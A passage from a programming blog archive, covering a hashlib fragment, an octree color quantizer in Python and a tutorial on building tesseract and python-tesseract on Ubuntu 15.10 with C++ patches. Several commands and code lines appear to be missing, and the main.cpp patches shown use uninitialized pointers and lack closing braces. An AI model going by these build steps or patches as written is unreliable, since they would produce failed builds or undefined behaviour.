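guaranteed = set(hashlib.algorithms_guaranteed)
extra = set(hashlib.algorithms_available) - guaranteed


def try_digest(name, data=b''):
    """Return the hex digest of data, or None if the algorithm is unusable."""
    try:
        return hashlib.new(name, data).hexdigest()
    except (ValueError, TypeError):
        return None


if __name__ == '__main__':
    for name in sorted(extra):
        print(name, try_digest(name))
```

The output differs from system to system, which is exactly the point: only the guaranteed set is portable.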

Saturday, February 13, 2016

Octree color quantizer in Python

Some time ago I found an interesting algorithm, octree color quantization. It used to be common in computer graphics (when devices could display only a limited number of colors), and nowadays it is mainly used for GIF images.

I've implemented one of the most widely used octree color quantization algorithms in Python. Here is the repository on GitHub:

Original image (24 bit):

Result image (colors reduced to 8 bit):

Result image palette:

An octree is a tree where each node has up to 8 children. A leaf node has no active children.
Each leaf node stores the number of pixels with its color (pixel_count) and the color value.

1) Adding a new color to the octree.
Start at level 0.
For example, a pixel's RGB color is (90, 113, 157). In binary it is (01011010, 01110001, 10011101).
The index of the node at the next level is calculated in the following way:
Write the R, G and B bits for the current level in binary, starting from the MSB. So the index will be from 000 to 111 (binary), i.e. from 0 to 7 (decimal).
If the maximum depth of the tree is less than 8, only the first bits of the color will matter.
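The index calculation can be written down in a few lines. This is a minimal sketch with a function name chosen for this example (color_index); level 0 uses the most significant bit of each channel and level 7 the least significant one.

```python
def color_index(color, level):
    """Child index (0..7) of an (R, G, B) color at the given tree level."""
    r, g, b = color
    shift = 7 - level  # level 0 looks at the MSB of each channel
    return (((r >> shift) & 1) << 2) | (((g >> shift) & 1) << 1) | ((b >> shift) & 1)


# Path of the example color through a tree of depth 8.
indices = [color_index((90, 113, 157), level) for level in range(8)]
# indices == [1, 6, 2, 7, 5, 1, 4, 3]
```

For (90, 113, 157) the first bits are R=0, G=0, B=1, so the color goes to child 1 at level 0, then to child 6 (R=1, G=1, B=0) at level 1, and so on.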
Here is the image with the first steps of adding the color:
If we have a tree with a maximum depth of 8, we will eventually have the following indices:
The full tree with depth 8 after adding the color (90, 113, 157):
If the next pixel color is again (90, 113, 157), the leaf node's R, G and B values are increased by the new color's R, G and B values, and the number of pixels with this color is incremented. So the color sum will be (180, 226, 314) and pixel_count will be 2:

2) Reduction
To build an image palette with, for example, at most 256 colors from an image with far more colors, the tree leaves must be reduced.
The reduction of nodes:
As we have the sum of R, G and B values and the number of pixels with this color, we can add the pixel counts and color channels of all leaves to the parent node and make it a leaf node (we don't even have to remove the children, because the get-leaves method will not go deeper if the current node is a leaf).
Reduction continues while the number of leaves is greater than the required maximum number of colors (in our case 256).
The main disadvantage of this approach is that up to 8 leaves can be reduced from a node at once, so the palette could end up with only 248 colors (in the worst case) instead of the expected 256.
As soon as the number of leaves is less than or equal to the required maximum number of colors, we can build the palette.

3) Palette building
The palette is filled with the average color of each leaf. As each leaf stores the number of pixels with its color and the sums of the R, G and B values, the average color is obtained by dividing the color channels by the number of pixels: palette_color = (color.R / pixel_count, color.G / pixel_count, color.B / pixel_count).
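The accumulate-then-average behaviour of a leaf can be illustrated with a tiny class. This is a simplified sketch, not the class from the repository: the name Leaf and its methods are assumptions made for this example, and integer division is used for the average.

```python
class Leaf:
    """Accumulates channel sums and a pixel count for one octree leaf."""

    def __init__(self):
        self.r = self.g = self.b = 0
        self.pixel_count = 0

    def add_color(self, color):
        # Sum the channels instead of storing every pixel separately.
        self.r += color[0]
        self.g += color[1]
        self.b += color[2]
        self.pixel_count += 1

    def average(self):
        # Palette entry for this leaf: channel sums divided by the count.
        n = self.pixel_count
        return (self.r // n, self.g // n, self.b // n)


leaf = Leaf()
leaf.add_color((90, 113, 157))
leaf.add_color((90, 113, 157))
```

After the two additions the leaf holds the sums (180, 226, 314) with pixel_count 2, and average() gives back (90, 113, 157). Merging children into a parent during reduction works the same way: the sums and counts are simply added.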

Wednesday, February 3, 2016

Installing tesseract for python on Ubuntu 15.10

Some time ago I wrote a tutorial on how to install tesseract for Python on Ubuntu 14.04.
Today I struggled with new challenges while installing tesseract and python-tesseract on Ubuntu 15.10. So here is how I made it work.

user@server:~$ cat /etc/lsb-release

Install packages
sudo apt-get install python-distutils-extra tesseract-ocr tesseract-ocr-eng libopencv-dev libtesseract-dev libleptonica-dev python-all-dev swig libcv-dev python-opencv python-numpy python-setuptools build-essential subversion git
sudo apt-get install autoconf automake libtool
sudo apt-get install libpng12-dev libjpeg62-dev libtiff4-dev zlib1g-dev

Download leptonica

tar xvf leptonica-1.73.tar.gz

build it

cd leptonica-1.73
make install

Download tesseract-ocr


tar xvf 3.04.00.tar.gz
cd tesseract-3.04.00
sudo make install
sudo ldconfig

And test:

user@server:~$ tesseract
  tesseract imagename|stdin outputbase|stdout [options...] [configfile...]

Check out `python-tesseract`

git clone

The "baseapi_mini.h" file in the ./python-tesseract/src/ folder needs to be updated:

class MutableIterator;
line: 85
class TessResultRenderer;

line 316:
  //void SetImage(const Pix* pix);
    void SetImage(Pix* pix);

line 477:
  bool ProcessPages(const char* filename,
                    const char* retry_config, int timeout_millisec,
                    STRING* text_out);
  bool ProcessPages(const char* filename, 
                    const char* retry_config, int timeout_millisec, 
                    TessResultRenderer* renderer);

line 493:
  bool ProcessPage(Pix* pix, int page_index, const char* filename,
                   const char* retry_config, int timeout_millisec,
                   STRING* text_out);
  bool ProcessPage(Pix* pix, int page_index, const char* filename,
                   const char* retry_config, int timeout_millisec,
                   TessResultRenderer* renderer);

The "main.cpp" file in the ./python-tesseract/src/ folder needs to be updated:

line: 15
#include "renderer.h"

line: 64
char* ProcessPagesWrapper(const char* image,tesseract::TessBaseAPI* api) {
const char *data = "";
tesseract::TessTextRenderer renderer(data);
api->ProcessPages(image, NULL, 0, &renderer);
return api->GetUTF8Text();

line: 73
char* ProcessPagesPix(const char* image,tesseract::TessBaseAPI* api) {
const char *data = "";    
tesseract::TessTextRenderer renderer(data);
int page=0;
Pix *pix;
pix = pixRead(image);
api->ProcessPage(pix, page, NULL, NULL, 0, &renderer);
return api->GetUTF8Text();

line: 86
char* ProcessPagesFileStream(const char* image,tesseract::TessBaseAPI* api) {
Pix *pix;
const char *data = "";
tesseract::TessTextRenderer renderer(data);
int page=0;
FILE *fp=fopen(image,"rb");
api->ProcessPage(pix, page, NULL, NULL, 0, &renderer);
return api->GetUTF8Text();

line 107:
char* ProcessPagesBuffer(char* buffer, int fileLen, tesseract::TessBaseAPI* api) {
FILE *stream;
if (stream == NULL) {
puts("cant't open stream using fmemopen");
return (char*)"Error";
Pix *pix;
int page=0;
const char *data = "";
tesseract::TessTextRenderer renderer(data);
if (stream != NULL)
api->ProcessPage(pix, page, NULL, NULL, 0, &renderer);
return api->GetUTF8Text();

and build it:

python clean
python build
sudo python install

After that, try to run your Python example.

If you get an error like this:
Error opening data file ./tessdata/eng.traineddata
Please make sure the TESSDATA_PREFIX environment variable is set to the parent directory of your "tessdata" directory.
Failed loading language 'eng'
Tesseract couldn't load any languages!
AdaptedTemplates != NULL:Error:Assert failed:in file adaptmatch.cpp, line 174
Segmentation fault (core dumped)

You can fix it by patching the "mainblk.cpp" file inside the tesseract-3.04.00/ccutil/ folder in the following way:

In this code of the "mainblk.cpp" file:

  if (argv0 != NULL) {
    datadir = argv0;
  } else {
    if (getenv("TESSDATA_PREFIX")) {
      datadir = getenv("TESSDATA_PREFIX");
    } else {
#define _STR(a) #a
#define _XSTR(a) _STR(a)
    datadir = _XSTR(TESSDATA_PREFIX);
#undef _XSTR
#undef _STR
    }
  }

  // insert code here

  // datadir may still be empty:
  if (datadir.length() == 0) {
    datadir = "./";
  }

add the following code at the "insert code here" place:

  if (getenv("TESSDATA_PREFIX")) {
      datadir = getenv("TESSDATA_PREFIX");
  } else {
    // check dir with tessdata
    struct stat sb;
    if (stat("/usr/share/tesseract-ocr/tessdata", &sb) == 0 && S_ISDIR(sb.st_mode)) {
      datadir = "/usr/share/tesseract-ocr";
    }
  }

and add the following include:

#include <sys/stat.h>

Rebuild and reinstall tesseract-ocr:

cd tesseract-3.04.00
sudo make install

So, after that, if the TESSDATA_PREFIX environment variable is set, it will be used; otherwise, if the tessdata folder exists in /usr/share/tesseract-ocr/, that location will be used; otherwise the directory of your Python example module (./) will be checked for the tessdata folder.
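The lookup order described above can be mirrored in Python, which is handy for checking in advance which directory the patched library would pick on a given machine. This is only a sketch of the same three steps; the function name resolve_datadir and its parameters are invented for this example and are not part of tesseract or python-tesseract.

```python
import os


def resolve_datadir(environ=os.environ, system_dir='/usr/share/tesseract-ocr'):
    """Return the directory that is expected to contain the tessdata folder."""
    prefix = environ.get('TESSDATA_PREFIX')
    if prefix is not None:
        return prefix  # 1) an explicit environment variable wins
    if os.path.isdir(os.path.join(system_dir, 'tessdata')):
        return system_dir  # 2) system-wide installation
    return './'  # 3) fall back to the current directory


if __name__ == '__main__':
    print(resolve_datadir())
```

Running it on the target machine shows whether the environment variable, the system directory or the current directory would be used.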

Test the installed python-tesseract using the tests in the test folder:

user@server:~/python-tesseract/src/test$ python
result(ProcessPagesWrapper)= The (quick) [brown] {fox} jumps!
Over the $43,456.78 <lazy> #90 dog
& duck/goose, as 12.5% of E-mail
from is spam.
Der ,,schnelle” braune Fuchs springt
fiber den faulen Hund. Le renard brun
«rapide» saute par-dessus le chien
paresseux. La volpe marrone rapida
salta sopra i] cane pigro. El zorro
marrén répido salta sobre el perro
perezoso. A raposa marrom répida
salta sobre 0 C50 preguieoso.

result(ProcessPagesFileStream)= The (quick) [brown] {fox} jumps!
Over the $43,456.78 <lazy> #90 dog
& duck/goose, as 12.5% of E-mail
from is spam.
Der ,,schnelle” braune Fuchs springt
fiber den faulen Hund. Le renard brun
«rapide» saute par-dessus le chien
paresseux. La volpe marrone rapida
salta sopra i] cane pigro. El zorro
marrén répido salta sobre el perro
perezoso. A raposa marrom répida
salta sobre 0 C50 preguicoso.

retStr length=422
result(ProcessPagesRaw) The (quick) [brown] {fox} jumps!
Over the $43,456.78 <lazy> #90 dog
& duck/goose, as 12.5% of E-mail
from is spam.
Der ,,schnelle” braune Fuchs springt
iiber den faulen Hund. Le renard brun
«rapide» saute par-dessus le chien
paresseux. La volpe marrone rapida
salta sopra i] cane pigro. El zorro
marrén répido salta sobre el perro
perezoso. A raposa marrom rapida
salta sobre 0 C50 preguicoso.

result(ProcessPagesBuffer)= The (quick) [brown] {fox} jumps!
Over the $43,456.78 <lazy> #90 dog
& duck/goose, as 12.5% of E-mail
from is spam.
Der ,,schnelle” braune Fuchs springt
iiber den faulen Hund. Le renard brun
«rapide» saute par-dessus le chien
paresseux. La volpe marrone rapida
salta sopra i] cane pigro. El zorro
marrén répido salta sobre el perro
perezoso. A raposa marrom rapida
salta sobre 0 C50 preguicoso.

user@server:~/python-tesseract/src/test$ python
The (quick) [brown] {fox} jumps!
Over the $43,456.78 <lazy> #90 dog
& duck/goose, as 12.5% of E-mail
from is spam.
Der ,,schnelle” braune Fuchs springt
fiber den faulen Hund. Le renard brun
«rapide» saute par-dessus le chien
paresseux. La volpe marrone rapida
salta sopra i] cane pigro. El zorro
marrén répido salta sobre el perro
perezoso. A raposa marrom répida
salta sobre 0 C50 preguieoso.